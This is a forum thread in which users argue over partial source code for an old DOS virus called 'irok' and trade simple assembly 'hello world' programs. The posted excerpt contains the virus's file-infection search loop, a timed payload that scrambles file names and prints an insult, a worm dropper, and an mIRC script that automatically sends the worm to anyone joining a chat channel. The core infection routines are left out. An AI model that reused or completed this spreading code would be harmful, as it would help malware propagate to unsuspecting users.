Let's walk through this virus source code, shall we?


R

RayLopez99

The poster that goes by "Dustin" in this group posted the below. Don't know where he got it, probably cut and paste from somewhere, but I'd thought it could be a good exercise to go through it, line by line, and figure out what it does. I would appreciate any comments, and I would cross-post this but Google Groups no longer supports that feature.

RL

(My comments in lines having REM in CAPS)

Again, the point of my exercise is to expose your ignorance to the
world, not mine. Show us what you got. I never said 'fully
functional'--I even said pseudocode is oK. Like the other poster
said, do you even read your posts?
write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write :)

REM AX, DX, CX are Intel Registers--how many such registers in the x86?--RL

if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return

REM - what do the lines above do? Perhaps file_handle > 4 goes to long file names? what address is "&hex4000"? why set bx,cx to these values, and what about na? Is this a 'null' or 'zero' for remaining registers?

read_file:
rem as the name implies, it reads bytes into a buffer. :)
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad! :)
rem cx register is how many bytes to read :)

REM the above comments makes no sense, not to mention the stupid smileys are annoying. But I don't see where the dx register was set to zero as he claims.


if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return

REM same as before, why? Why is file_handle not < 4? why this cutoff? Perhaps very long file names are not supported by this program?

actual_virus_replication_start:
rem The actual code responsible for replication control has
rem moved down here. It's a new technique of coding that I intend
rem for my future viruses to use.
rem used to be called start_virus:
Rem this is the central virus infection code.
rem We will search for a maximum of 10 files per run.
errcode=0
attr=6
kewl=0
virii=7

REM What are these parameters 'errcode' 'attr' why set to 6? etc

CALL SUB "FindFirstF" proc$ Attr ErrCode
REM what is proc$ ? what is this line for?

WHILE ErrCode = 0
CALL SUB "GetNameF" FileName$
filename$=virupath$+filename$
if sleepy=0 then
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
else
errcode=1
endif
CALL SUB "FindNextF" ErrCode
if kewl=virii then
errcode=1
endif
WEND

REM seems I understand what is going on at a conceptual level but without the SUB functions not 100% clear. Need the gosub 'lets_infect'

return

rem ***BEGIN PAYLOAD(S) CODE
payload:
clear_to_run=1
if hre$>"20" then

REM what is the above line doing?

rem Executables remain offline for the remainder of the evening.
clear_to_run=0
endif


if min$="17" then


rem We're fixing to hose this dudes drive. Well, not really.

REM typical stupid self-aggrandizing comment. Imagine--this guy is writingthis for a future audience. Ironically, now that he has an audience (if in fact our Dustin is the real author) he will not or cannot explain his code. Wow, that speaks volumes. Either incompetence / fakery, excessive misplaced paranoia about the law and how it operates (and he's already in deep water, for reasons he does not even understand), or just playing drama games for his clueless kiddie script non-programmer followers


rem We're renaming all files/directorys from current\root to
rem high ascii characters. The user doesn't actually lose anything,
rem he just (average user) doesn't know what to do at this point. ;p
rem this takes a second or two, so We're going to display some
rem text to keep the user busy.
cls
print"Some say the end is near. Some say we'll see Armageddon"
print"soon. I certainly hope we will. The only way to fix it is"
print"to flush it all away. Any ****ing joint, any ****in Day."
print""
print"**** all these gun toting hip gangster wannabes. **** your"
print"tattoes, **** all you junkies and your short memory. I'm"
print"praying for rain, I'm prayin for tidal waves. I wanna see"
print"the ground give way. I wanna watch it all go down. Mah"
print"please flush it all away, I wanna see it go riding down. I"
print"wanna see it go riding. Watch you flush it all away."
print""
print"Where do bad folks go when they die? They don't goto heaven"
print"where the angels fly. They goto a lake of fire and fry. See"
print"em again till the 4th of July. People cry and people moan."
print"look for a dry place to call their own, look for a dry place"
print"to rest there bones."
print""
gosub whack_a_system:
print"Thanks for reading the text above, I've had enough time to"
print"remove the contents of your hard disk for you. :)"
gosub keypress:

if min$="21" then
print"ž IRoK v1.1 - RaiD/SLAM[2000]"
gosub keypress:
call sub "Stars"
return
endif

REM what is the above? Perhaps to display something in stdout, the console? Is this a console mode MS-DOS virus?



rem End of payload jumpsystem!

mirc_drop:
filename$=drive$
filename$=filename$+"mirc\irok.exe"
script$=drive$
script$=script$+"mirc\script.ini"
gosub raidyworm:
rem Worm copy dumped
rem raidyworm returns filename$ that you sent.


REM need subs--that's where the action is...Dustin did not provide. Scared again it seems.

tempfile$=filename$
filename$=script$
gosub set_attr:
filename$=tempfile$
rem drop script
open"o",2,script$
sensitivemsg=1
msg$="[script]|n0=on 1:JOIN:#:{|n1=if ($nick != $me) {|"
gosub dump_msg:
msg$="n2= /dcc send $nick "
msg$=msg$+filename$
msg$=msg$+"|"
gosub dump_msg:
msg$="n3= }|n4=}|n5=on 1:TEXT:irok:#:/amsg My computer is 0wned byIRoK
v1.1|"
gosub dump_msg:
close 2
return

vbsdrop:
rem we have to drop a piece of VBS material. We have an external routine
rem which handles this. We need only create the worm file, and then
rem call the routine. However, before we do this, We check to see if
we've
rem done this before. If so, we don't ever do it again. Well, unless the
rem user deletes our marker.
vbsdrop=0
open"i",2,"c:\windows\system\winrde.dll"
if error>0 then
rem we haven't done this, ok kewl.
vbsdrop=1
endif
close 2
if vbsdrop=1 then
tempname$=filename$
filename$="c:\windows\system\irok.exe"
gosub raidyworm:
rem Ok, worms dropped.
filename$=tempname$
call sub "vbsroutine"
rem Now create marker.
open"o",2,"c:\windows\system\winrde.dll"
for x=1 to 8095
print #2,x
next x
close 2
endif
return

whack_a_system:
rem Simple routine. One line. ;p
call sub "drago"
return

raidyworm:
rem worm dump
rem specify filename to dump too in filename$
newattr=0
gosub set_attr:
gosub create_file:
tempsize=virus_size
tempsize=tempsize+1
bytesize=tempsize
dx=varptr(virus_data(0))
gosub write_file:
gosub close_file:
rem One worm to order.
return

rem ***--> End of Payload section.
Commented enough for you Ray?
That's not psuedo code either. thats verbatim irok source code.
It's missing stuff. See the above and comment.
if she even knows you. And non-programmers like the kiddie scripters
you so despise. Dream on. You are nothing.
RL

PS--I challenge Dustin to show his 'mastery' of assembly by simply posting here a simple subroutine in assembly that will display "FSCK YOU" on the screen if a user runs the program. Simple enough, but if Dustin is a cut-and-paste kiddie scripter as I suspect he is, he won't find this on the net and will fail this simple test.
 
Ad

Advertisements

D

Dustin

The poster that goes by "Dustin" in this group posted the below.
Don't know where he got it, probably cut and paste from somewhere,
but I'd thought it could be a good exercise to go through it, line by
line, and figure out what it does. I would appreciate any comments,
and I would cross-post this but Google Groups no longer supports that
feature.

RL

(My comments in lines having REM in CAPS)



write_file:
rem this routine will write selected bytes at whatever current
position rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like
so: rem dx=varptr(buffer(0))
rem cx is how many bytes to write :)

REM AX, DX, CX are Intel Registers--how many such registers in the
x86?--RL
I see you can use google. You've demonstrated google ability here, not
that you understand what I'm doing.
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return

REM - what do the lines above do? Perhaps file_handle > 4 goes to
long file names? what address is "&hex4000"? why set bx,cx to these
values, and what about na? Is this a 'null' or 'zero' for remaining
registers?
As I said, you googled for the information you provided above. You could
google for this too. Long filenames? Via file handle? Er, no. :)
read_file:
rem as the name implies, it reads bytes into a buffer. :)
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so:
dx=varptr(buffer(0)) rem if you don't, this routine will not work, or
will overwrite some rem other section of memory. And for virus
coding, this is very bad! :) rem cx register is how many bytes to
read :)

REM the above comments makes no sense, not to mention the stupid
smileys are annoying. But I don't see where the dx register was set
to zero as he claims.
it's not set to zero. buffer(0) is a reference point. it's an array,
Ray! :) First element.
if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return

REM same as before, why? Why is file_handle not < 4? why this
cutoff? Perhaps very long file names are not supported by this
program?
Some programmer you are...
REM What are these parameters 'errcode' 'attr' why set to 6? etc
I didn't think you'd be able to follow along... Even with commented
code, in asic of all things.. Cripes.
CALL SUB "FindFirstF" proc$ Attr ErrCode
REM what is proc$ ? what is this line for?
Damnit Ray. What good would it do me to post pure asm, or pseudo code as
you said? You can't even follow asic!
WHILE ErrCode = 0
CALL SUB "GetNameF" FileName$
filename$=virupath$+filename$
if sleepy=0 then
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
else
errcode=1
endif
CALL SUB "FindNextF" ErrCode
if kewl=virii then
errcode=1
endif
WEND

REM seems I understand what is going on at a conceptual level but
without the SUB functions not 100% clear. Need the gosub
'lets_infect'
No you don't. Really, you don't need that. Between the two source
snippits posted since yesterday, had you really been a programmer; you'd
already know what it's doing, AND how.

return

rem ***BEGIN PAYLOAD(S) CODE
payload:
clear_to_run=1
if hre$>"20" then

REM what is the above line doing?
It's checking a variable in military time. If it's after 8pm, your
original program will not run. Just irok. It's put your infected
applications to sleep; and this is how it checks the time.
rem Executables remain offline for the remainder of the evening.
clear_to_run=0
endif


if min$="17" then


rem We're fixing to hose this dudes drive. Well, not really.

REM typical stupid self-aggrandizing comment. Imagine--this guy is
writing this for a future audience. Ironically, now that he has an
audience (if in fact our Dustin is the real author) he will not or
cannot explain his code. Wow, that speaks volumes. Either
incompetence / fakery, excessive misplaced paranoia about the law and
how it operates (and he's already in deep water, for reasons he does
not even understand), or just playing drama games for his clueless
kiddie script non-programmer followers
I shouldn't have to explain this code. It's very simple. It wasn't
intended for an audience Ray. Your looking at 12 year old source code.
REM what is the above? Perhaps to display something in stdout, the
console? Is this a console mode MS-DOS virus?
Didn't you read it's long description at the url posted? It's a DOS
based virus, Yes. You can't pipe it to stdout; I used asics internal
print routines instead of my faster asm ones which supported piping.

It'll display in console, and only in console.
rem End of payload jumpsystem!

mirc_drop:
filename$=drive$
filename$=filename$+"mirc\irok.exe"
script$=drive$
script$=script$+"mirc\script.ini"
gosub raidyworm:
rem Worm copy dumped
rem raidyworm returns filename$ that you sent.


REM need subs--that's where the action is...Dustin did not provide.
Scared again it seems.
The action is in the subroutines. Yes, everything else sets it up for
subroutines. Any decent coder will not rehash the same code, he'll use
routines multiple times instead.

Not scared of anything, just not going to help you write a virus to
cause mischief. Besides, I remember your question about routing and how
how dissed me after I provided the information you requested.

You don't really need the missing subroutines if you were half the
programmer, or sorry, coder you said you were. The code I've posted is
enough to get the idea and concept.
It's missing stuff. See the above and comment.
I told you from the getgo it would be. I won't provide you complete
source to irok, and you can't find it online either. I never released
it. [g]
PS--I challenge Dustin to show his 'mastery' of assembly by simply
posting here a simple subroutine in assembly that will display "FSCK
YOU" on the screen if a user runs the program. Simple enough, but if
Dustin is a cut-and-paste kiddie scripter as I suspect he is, he
won't find this on the net and will fail this simple test.
Okay. Assembler you want, assembler you get.
Assemble using nasm. Tasm should work, but it was written in and for
nasm.

This is my hello world in nasm...

assemble it, and run.

segment code

start:
mov ax,data
mov ds,ax
mov ax,stack
mov ss,ax
mov sp,stacktop

mov dx,hello
mov ah,9
int 0x21

mov ax,0x4c00
int 0x21

segment data

hello: db 'hello, ****ing, world',13,10,'$'

segment stack stack
resb 64
stacktop:



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.
 
D

Dustin

Okay. Assembler you want, assembler you get.
Assemble using nasm. Tasm should work, but it was written in and for
nasm.
Written in=qedit, saved as ascii text and fed to nasm via cli. [g] Just
in case Ant wants to be anal with me on this. [eg]
This is my hello world in nasm...

assemble it, and run.

segment code

start:
mov ax,data
mov ds,ax
mov ax,stack
mov ss,ax
mov sp,stacktop

mov dx,hello
mov ah,9
int 0x21

mov ax,0x4c00
int 0x21

segment data

hello: db 'hello, ****ing, world',13,10,'$'

segment stack stack
resb 64
stacktop:
Nothing special, not commented as well, it shouldn't need to be Ray! :)

Oh, and just so you know, this is assembler basics 101; it can be found
online in many different styles. Theres several ways to write this to do
the same thing. My code could even be made smaller by removing a few
things you don't actually need.

You can't get any lower bytewise than assembler or outright machine
language. Not even C can make a binary smaller. [g]


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.
 
D

Dustin

PS--I challenge Dustin to show his 'mastery' of assembly by simply
posting here a simple subroutine in assembly that will display "FSCK
YOU" on the screen if a user runs the program. Simple enough, but if
Dustin is a cut-and-paste kiddie scripter as I suspect he is, he
won't find this on the net and will fail this simple test.
segment code

start:
mov ax,data
mov ds,ax
mov ax,stack
mov ss,ax
mov sp,stacktop

mov dx,hello
mov ah,9
int 0x21

mov ax,0x4c00
int 0x21

segment data

hello: db 'hello, ****ing, world',13,10,'$'

segment stack stack
resb 64
stacktop:


Lemme know if you need it explained line by line too. [g]
you can find nasm online for free.

Now then...

Unless you can eat some crow like a good man, and show some respect; I'm
about done explaining old ass technology and ways of doing things. Your
challenges are boring the **** out of me, too. You've stated you have a
book on viruses.. Have you opened the damn thing?






--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.
 
D

Dustin

segment code

start:
mov ax,data
mov ds,ax
mov ax,stack
mov ss,ax
mov sp,stacktop

mov dx,hello
mov ah,9
int 0x21

mov ax,0x4c00
int 0x21

segment data

hello: db 'hello, ****ing, world',13,10,'$'

segment stack stack
resb 64
stacktop:
Which turns into :

Volume in drive C has no label.
Volume Serial Number is B051-3A91

Directory of C:\Program Files\nasm

03/15/1997 09:21 PM 259 hello.asm
03/15/1997 02:15 PM 561 HELLO.EXE
03/15/1997 02:15 PM 196 hello.obj
3 File(s) 1,016 bytes
0 Dir(s) 27,684,458,496 bytes free

Hmm. I'm running low on drive space...

See how old that code is too Ray? [g] Older than irok. hehehe.

Punkass.


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.
 
G

G. Morgan

Dustin said:
segment code

start:
mov ax,data
mov ds,ax
mov ax,stack
mov ss,ax
mov sp,stacktop

mov dx,hello
mov ah,9
int 0x21

mov ax,0x4c00
int 0x21

segment data

hello: db 'hello, ****ing, world',13,10,'$'

segment stack stack
resb 64
stacktop:


Lemme know if you need it explained line by line too. [g]
you can find nasm online for free.
How do I manually assemble it with 'debug'?
 
Ad

Advertisements

D

Dustin

Dustin said:
segment code

start:
mov ax,data
mov ds,ax
mov ax,stack
mov ss,ax
mov sp,stacktop

mov dx,hello
mov ah,9
int 0x21

mov ax,0x4c00
int 0x21

segment data

hello: db 'hello, ****ing, world',13,10,'$'

segment stack stack
resb 64
stacktop:


Lemme know if you need it explained line by line too. [g]
you can find nasm online for free.
How do I manually assemble it with 'debug'?
sigh

convert my 0x to 21h and type each line one at a time...
would just be easier if you assembled it with nasm...
debug is a pain in the ass.



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.
 
D

Dustin

Dustin said:
segment code

start:
mov ax,data
mov ds,ax
mov ax,stack
mov ss,ax
mov sp,stacktop

mov dx,hello
mov ah,9
int 0x21

mov ax,0x4c00
int 0x21

segment data

hello: db 'hello, ****ing, world',13,10,'$'

segment stack stack
resb 64
stacktop:


Lemme know if you need it explained line by line too. [g]
you can find nasm online for free.
How do I manually assemble it with 'debug'?
sigh

convert my 0x to 21h and type each line one at a time...
would just be easier if you assembled it with nasm...
debug is a pain in the ass.
I'm assuming you know how to enter assemble mode here with debug,
morgan. If you're being cheeky with me, I won't offer any more help :)


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.
 
B

Buffalo

The poster that goes by "Dustin" in this group posted the below. Don't know
where he got it, probably cut and paste from somewhere, but I'd thought it
could be a good exercise to go through it, line by line, and figure out what
it does. I would appreciate any comments, and I would cross-post this but
Google Groups no longer supports that feature.

RL
Teenage jerk-off!!
Buffalo
 
D

Dustin

The poster that goes by "Dustin" in this group posted the below.
Don't know where he got it, probably cut and paste from somewhere,
but I'd thought it could be a good exercise to go through it, line by
line, and figure out what it does. I would appreciate any comments,
and I would cross-post this but Google Groups no longer supports that
feature.

RL
Teenage jerk-off!!
Buffalo
hehehe.. I'm starting to wonder about Rays age myself.. No experience with
older languages, inability to understand a very simple language...

and he keeps telling me i'm in my 60s. :)
 
G

G. Morgan

Dustin said:
Dustin wrote:

segment code

start:
mov ax,data
mov ds,ax
mov ax,stack
mov ss,ax
mov sp,stacktop

mov dx,hello
mov ah,9
int 0x21

mov ax,0x4c00
int 0x21

segment data

hello: db 'hello, ****ing, world',13,10,'$'

segment stack stack
resb 64
stacktop:


Lemme know if you need it explained line by line too. [g]
you can find nasm online for free.

How do I manually assemble it with 'debug'?
sigh

convert my 0x to 21h and type each line one at a time...
would just be easier if you assembled it with nasm...
debug is a pain in the ass.
I'm assuming you know how to enter assemble mode here with debug,
morgan. If you're being cheeky with me, I won't offer any more help :)

No, I'm serious. I opened a debug shell and tried to type (paste
actually) the lines in. I got all errors. Then I did one at a time,
typed, error each time. Then I tried the "assemble" command pointed to
a file, didn't work. It's been a long time since I've done anything in
'debug', forgot it all! I didn't look it up at the time (still haven't)
because I was watching the Olympics opening.

No biggie. You don't have to help - I took a chance even asking.
 
Ad

Advertisements

H

Hot-Text

G. Morgan said:
Dustin said:
Dustin wrote:

segment code

start:
mov ax,data
mov ds,ax
mov ax,stack
mov ss,ax
mov sp,stacktop

mov dx,hello
mov ah,9
int 0x21

mov ax,0x4c00
int 0x21

segment data

hello: db 'hello, ****ing, world',13,10,'$'

segment stack stack
resb 64
stacktop:


Lemme know if you need it explained line by line too. [g]
you can find nasm online for free.

How do I manually assemble it with 'debug'?



sigh

convert my 0x to 21h and type each line one at a time...
would just be easier if you assembled it with nasm...
debug is a pain in the ass.
I'm assuming you know how to enter assemble mode here with debug,
morgan. If you're being cheeky with me, I won't offer any more help :)

No, I'm serious. I opened a debug shell and tried to type (paste
actually) the lines in. I got all errors. Then I did one at a time,
typed, error each time. Then I tried the "assemble" command pointed to
a file, didn't work. It's been a long time since I've done anything in
'debug', forgot it all! I didn't look it up at the time (still haven't)
because I was watching the Olympics opening.

No biggie. You don't have to help - I took a chance even asking.
03h​ CPU: The lowest non-reserved interrupt,
it is used exclusively for debugging,
and the ​INT 03​ handler is always implemented by a debugging program
 
D

Dustin

No biggie. You don't have to help - I took a chance even asking.
Just use nasm. Copy my post source into notepad, be sure to save it as an
ascii text! file.

Make life easier for yourself.
 
D

Dustin

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dustin wrote:

segment code

start:
mov ax,data
mov ds,ax
mov ax,stack
mov ss,ax
mov sp,stacktop

mov dx,hello
mov ah,9
int 0x21

mov ax,0x4c00
int 0x21

segment data

hello: db 'hello, ****ing, world',13,10,'$'

segment stack stack
resb 64
stacktop:


Lemme know if you need it explained line by line too. [g]
you can find nasm online for free.

How do I manually assemble it with 'debug'?



sigh

convert my 0x to 21h and type each line one at a time...
would just be easier if you assembled it with nasm...
debug is a pain in the ass.




I'm assuming you know how to enter assemble mode here with debug,
morgan. If you're being cheeky with me, I won't offer any more help
:)

No, I'm serious. I opened a debug shell and tried to type (paste
actually) the lines in. I got all errors. Then I did one at a
time, typed, error each time. Then I tried the "assemble" command
pointed to a file, didn't work. It's been a long time since I've
done anything in 'debug', forgot it all! I didn't look it up at the
time (still haven't) because I was watching the Olympics opening.

No biggie. You don't have to help - I took a chance even asking.
The sumbitch doesn't have a clue what he is doing. Without BASIC he's
dead. He's running a scam on you, and blaming the code failure on
you. -----BEGIN PGP SIGNATURE-----
Code failure? No scam. that's piss simple assembler. The failure is
indeed on Morgans end. he doesn't know what he's doing and I've not been
all that helpful.

Speaking of basic, do you know what the source code I posted does? I
haven't seen you comment offering to help Ray understand it better. ;p

--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.
 
D

Dustin

The poster that goes by "Dustin" in this group posted the below.
Don't know where he got it, probably cut and paste from somewhere,
but I'd thought it could be a good exercise to go through it, line by
line, and figure out what it does. I would appreciate any comments,
and I would cross-post this but Google Groups no longer supports that
feature.

RL
I forgot to ask... :) So pardon me for making yet another post! in this
thread of yours...

Do you really think anyones going to tell you what the code is doing?
it's partial source to a known virus dude. A well known, potentially
harmful virus. Nobodies going to help you get it up and running.

Fact is, nobody besides me has the source code. Do you know why? Go
ahead, try googling for irok v1.1c source files. You won't find them.

C'mon Ray. You said you're a programmer (Well, you said coder first,
but.. I digress).. We'll go with programmer... Why would I be the only
person to have the source code?

as you don't require fully functional Ray, why the need for some
specific subroutines I sorta, neglected to provide? [g]
PS--I challenge Dustin to show his 'mastery' of assembly by simply
posting here a simple subroutine in assembly that will display "FSCK
YOU" on the screen if a user runs the program. Simple enough, but if
Dustin is a cut-and-paste kiddie scripter as I suspect he is, he
won't find this on the net and will fail this simple test.
You won't find the source of irok I posted here on the net, Ray. You can
find assembler "hello world" programs online and even in books you can
hold in your hand. Also in online help, tutes and many many text files
covering a wide variety of assembler topics. From, writing legit apps,
to writing viruses, malware, etc etc etc... cracks, keygens.. whatever
you can think of.

My assembler while written by me is nothing special. :) It's a simple
int21h call to print to screen and another to exit back to console/dos.

Funny you didn't even ask me to include that, but i'm so used to
properly exiting, I do. ;p

My other assembler program also prints hello ****ing world, but does so
by decrypting and then jumping to another subroutine that's encrypted on
disc. and remains encrypted on disc, but not in memory. The subroutine
is an int21h call to print the contents of a memory location. Same thing
the source I already posted is doing, it's just decrypting executable
code and running it later. [g] In memory instead of on disc, as I
typically did when using asic...

in pseudo terms Ray...

it modifies it's memory image and runs additional code you don't know is
code in the executable. [g]

Someone like Ant would know tho, he's an expert at disassembling. He'd
know what i was upto, and since this code has no anti-debug tricks, he'd
open it right up.

And before you ask, I *won't* be sharing code like that with you, in any
language. You can do it in asic too, my viruses all do. [g]

It's one of the routines I left out. hehehehehehehe

Honest reason being, you have no legitimate need to know how to do
things like that. You can think I'm ducking out on it if you want, or
being evasive.. but, in all actuality; I really can't ethically explain
the details or provide functional source code that will do any of those
functions so that you or someone else would understand it.

If I do, I place my credits and access in serious jeopardy. You just
don't understand the effort I put into it.It took me years to earn the
respect of my peers from the av/am communities. They knew of my
background in Vx, I had to prove myself. That I wasn't upto no good or
setting anyone up. It's been 12 years, nothing malicious has been
authored by me; nor have I helped anyone write malicious code.

So, you can believe the anonymous remailer who thinks I only know basic
and probably not even that.. OR! You can go with option 2, and believe
Kurt and FromtheRafters oh, and me.

One last comment, I worked for malwarebytes for two years. That's a long
long time to bullshit people and get away with it. Especially technical
people who expect you to study malware everyday, all day. People who,
like me, know this shit. It was good money, but I earned every penny of
it. [g]

So think what you want, troll all you like. I am who I say I am, I have
done what I've said I've done.

--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.
 
D

Dustin

a
mov dx,010c
mov ah,09
int 21
mov ax,4c00
int 21
db 42
db 6f
db 6f
db 21
db 24

g
Ant. :) Why you... lol



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.
 
Ad

Advertisements

R

RayLopez99

:






a

mov dx,010c

mov ah,09

int 21

mov ax,4c00

int 21

db 42

db 6f

db 6f

db 21

db 24



g
// Dustin code

segment code

start:
mov ax,data
mov ds,ax
mov ax,stack
mov ss,ax
mov sp,stacktop

mov dx,hello
mov ah,9
int 0x21

mov ax,0x4c00
int 0x21

segment data

hello: db 'hello, ****ing, world',13,10,'$'

segment stack stack
resb 64
stacktop:
// end


Ant, or Dustin: can you please go through this code line by line? I appreciate it. It's short enough that I think you can comment without too much effort.

Thanks in advance. Seems Ant's code is more compact, whereas Dustin, as G. Morgan points out implicitly, may be faking it or taking shortcuts (not clear which as apparently it does not compile).

I intend to to use this for assembly programming (using Visual Studio): http://www.codeproject.com/Articles/271627/Assembly-Programming-with-Visual-Studio-2010

RL
 
Ad

Advertisements

R

RayLopez99

I forgot to ask... :) So pardon me for making yet another post! in this

thread of yours...
No problem Dustin, ask away. It seems to me you, unlike Ant, unlike Morgan, unlike me, unlike some others here, enjoy the "drama" or "human interest"aspect of this thread more than the technical part. That's fine, but it reminds me of a woman. She is more interested in such things as the color of a car rather than actually looking under the hood. It's OK though.

Do you really think anyones going to tell you what the code is doing?

it's partial source to a known virus dude. A well known, potentially

harmful virus. Nobodies going to help you get it up and running.
? I don't understand your assumptions. Perhaps you are projecting yours.
Fact is, nobody besides me has the source code. Do you know why? Go

ahead, try googling for irok v1.1c source files. You won't find them.



C'mon Ray. You said you're a programmer (Well, you said coder first,

but.. I digress).. We'll go with programmer... Why would I be the only

person to have the source code?
The only reasons would be that you intend to produce other viruses based onthis source code, and you feel (a) the anti-virus companies could spot your new viruses easier if they had this source, or (b) more importantly, you don't want other virus writers easily replicating what you did if they had this source. But even those logical reasons are faulty, but I won't get into it here.
as you don't require fully functional Ray, why the need for some

specific subroutines I sorta, neglected to provide? [g]
Because some interesting things are there. BTW, encryption as you mention in another post is rather routine in assembly, I found out Googling it.

You wanna talk color Dustin? By all means my gay-ish friend. It's kind offun sure and it's something you appear to excel in. You asked me about myage earlier and all I can say on that is that I'm probably younger than you.

RL
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Top